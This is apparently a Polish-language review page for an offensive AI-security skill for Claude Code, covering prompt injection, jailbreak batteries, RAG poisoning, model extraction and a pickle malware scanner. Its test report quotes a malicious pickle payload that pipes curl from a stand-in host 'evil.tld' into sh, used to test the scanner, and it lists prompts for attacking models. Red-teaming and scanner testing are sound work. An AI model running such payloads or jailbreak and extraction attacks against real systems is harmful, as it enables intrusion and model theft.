AI Security

Ofensywne testowanie systemów LLM/ML: prompt injection, zatruwanie RAG, skanowanie modeli pickle

Autor: hypnguyen1209 · hypnguyen1209/offensive-claude

Testowano · Działa ★ 9.2/10

AI Security — Ofensywne testowanie systemów LLM/ML: prompt injection, zatruwanie RAG, skanowanie modeli pickle

Co robi ten skill

Umiejętność ofensywnego bezpieczeństwa do red-teamingu systemów AI/ML: prompt-injection i wieloetapowe baterie jailbreak, zatruwanie RAG/vector-DB, audyty zatruwania narzędzi MCP/agent, skanowanie złośliwego oprogramowania modeli pickle przed załadowaniem oraz sondy ekstrakcji modeli czarnej skrzynki/wnioskowania o członkostwie, z mapowaniami OWASP LLM Top-10 i MITRE ATLAS. Uruchamia się, gdy użytkownik prosi o atakowanie, red-teaming lub audyt LLM, chatbota, potoku RAG, serwera MCP lub pobranego artefaktu modelu. Zawiera pięć uruchamialnych skryptów Python oraz pięć szczegółowych analiz referencyjnych powiązanych z konkretnymi CVE z lat 2024-2025.

Raport z testu

Pobrano skills/ai-security/SKILL.md i sprawdzono 3 dołączone pliki (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) — wszystkie HTTP 200. Dla OUTPUT uruchomiłem skrypt scripts/model_scan.py (tylko stdlib) umiejętności na przygotowanych przeze mnie plikach pickle: złośliwym z __reduce__ -> os.system("curl http://evil.tld/x | sh"), nieszkodliwym oraz nieszkodliwym, którego dane zawierały jedynie ciągi "operating_system"/"subprocess". Linia bazowa (naiwny byte-grep) oznaczyła złośliwy plik, ale także FALSE-POSITIVED nieszkodliwy plik listy etykiet. Umiejętność zdeasemblowała kody operacji pickle za pomocą pickletools, rozwiązała posix.system poprzez REDUCE-reachability jako wywoływalny element na czarnej liście (strukturalny JSONL: severity high, CWE-502, AML.T0011, exit code 2 jako brama CI) i prawidłowo oczyściła oba nieszkodliwe pliki. Zweryfikowano instalację w czystym mktemp HOME, umieszczając SKILL.md w ~/.claude/skills/ai-security/SKILL.md.

Testowano: 2026-07-31 · Claude Code 2.x (agent harness)

Instalacja

git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src
mkdir -p ~/.claude/skills
cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security
# Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/).
# Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers;
#   promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint.
# Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone):
#   /plugin marketplace add hypnguyen1209/offensive-claude
#   /plugin install offensive-claude@offensive-claude-marketplace
# NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.

Komendy i przykładowe prompty

  • /ai-securityOfensywne testowanie systemów LLM/ML: prompt injection, zatruwanie RAG, skanowanie modeli pickle

Skille uruchamiają się na zwykłe polecenia — bez komend do zapamiętania. Po instalacji aktywują go prompty takie jak te (po angielsku):

  • Test this model against known jailbreak techniques
  • Check this RAG pipeline for vector poisoning
  • Run a model extraction attack against this API